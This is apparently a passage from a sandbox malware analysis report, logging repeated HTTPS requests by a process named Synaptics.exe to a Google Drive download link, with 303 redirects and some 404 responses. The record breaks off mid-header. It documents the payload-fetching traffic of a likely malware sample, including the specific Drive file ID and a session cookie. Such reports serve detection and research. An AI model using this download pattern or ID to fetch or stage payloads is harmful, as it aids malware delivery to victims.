                                                                                                                                                      Cookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      72192.168.2.1150017172.217.18.1104437604C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-30 10:25:50 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Host: docs.google.com
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Cookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      73192.168.2.1150022172.217.18.1104437604C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-30 10:25:51 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Host: docs.google.com
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Cookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT
                                                                                                                                                      2024-12-30 10:25:51 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                      Content-Type: application/binary
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:51 GMT
                                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-kUP4CuTy2T8iIDf_1XcTOA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Server: ESF
                                                                                                                                                      Content-Length: 0
                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Connection: close


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      74192.168.2.1150023172.217.18.1104437604C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-30 10:25:51 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Host: docs.google.com
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Cookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT
                                                                                                                                                      2024-12-30 10:25:51 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                      Content-Type: application/binary
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:51 GMT
                                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-sb4Y6YBXridQLP_pGfBS4w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Server: ESF
                                                                                                                                                      Content-Length: 0
                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Connection: close


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      75192.168.2.1150031172.217.18.1104437604C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-30 10:25:52 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Host: docs.google.com
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Cookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT
                                                                                                                                                      2024-12-30 10:25:52 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                      Content-Type: application/binary
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:52 GMT
                                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-kKBrDHA9vxLkK2jvFkCXDA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Server: ESF
                                                                                                                                                      Content-Length: 0
                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Connection: close


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      76192.168.2.1150033172.217.18.1104437604C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-30 10:25:52 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Host: docs.google.com
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Cookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT
                                                                                                                                                      2024-12-30 10:25:52 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                      Content-Type: application/binary
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:52 GMT
                                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-HLgB41SUJ8v3ReTe7rMENw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Server: ESF
                                                                                                                                                      Content-Length: 0
                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Connection: close


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      77192.168.2.1150030142.250.181.2254437604C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-30 10:25:52 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT
                                                                                                                                                      2024-12-30 10:25:53 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                                                      X-GUploader-UploadID: AFiumC6RbeOfp6JXwP5iQZw1PDY8rOeVzI3p2gDOR8zgMmljhjgSFSmnT5prkK1IYGkdX_2C41wx2IE
                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:52 GMT
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-zlm4UgkhaA9witfbkbXu3w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Content-Length: 1652
                                                                                                                                                      Server: UploadServer
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                      Connection: close
                                                                                                                                                      2024-12-30 10:25:53 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                                      2024-12-30 10:25:53 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 57 63 4d 64 47 33 53 74 4e 33 37 4a 56 6f 47 7a 68 50 30 61 46 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                                                      Data Ascii: 404 (Not Found)!!1</title><style nonce="WcMdG3StN37JVoGzhP0aFA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                                      2024-12-30 10:25:53 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                      Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      78192.168.2.1150032142.250.181.2254437604C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-30 10:25:52 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT
                                                                                                                                                      2024-12-30 10:25:53 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                                      X-GUploader-UploadID: AFiumC4A-q_zcd39YnCJK9hh-oQ6O3WyIzEb1YAUJfO3G1LxG1Pvi5hVgthcae9tC_ye0wyV
                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:52 GMT
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-ILeC2Zcb0O5J7GMk2B98dA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Content-Length: 1652
                                                                                                                                                      Server: UploadServer
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                      Connection: close
                                                                                                                                                      2024-12-30 10:25:53 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                                      2024-12-30 10:25:53 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4f 4d 46 59 44 67 4f 56 44 33 39 38 57 36 6a 64 4a 5f 36 38 62 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                                      Data Ascii: t Found)!!1</title><style nonce="OMFYDgOVD398W6jdJ_68bA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                      2024-12-30 10:25:53 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                      Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      79192.168.2.1150041172.217.18.1104437604C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-30 10:25:53 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Host: docs.google.com
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Cookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT
                                                                                                                                                      2024-12-30 10:25:53 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                      Content-Type: application/binary
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:53 GMT
                                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-krCWGv6urShK2bKY6LflEg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Server: ESF
                                                                                                                                                      Content-Length: 0
                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Connection: close


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      80192.168.2.1150043172.217.18.1104437604C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-30 10:25:53 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Host: docs.google.com
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Cookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT
                                                                                                                                                      2024-12-30 10:25:53 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                      Content-Type: application/binary
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:53 GMT
                                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-ymSie-u_zU56VbKMQjhfkQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
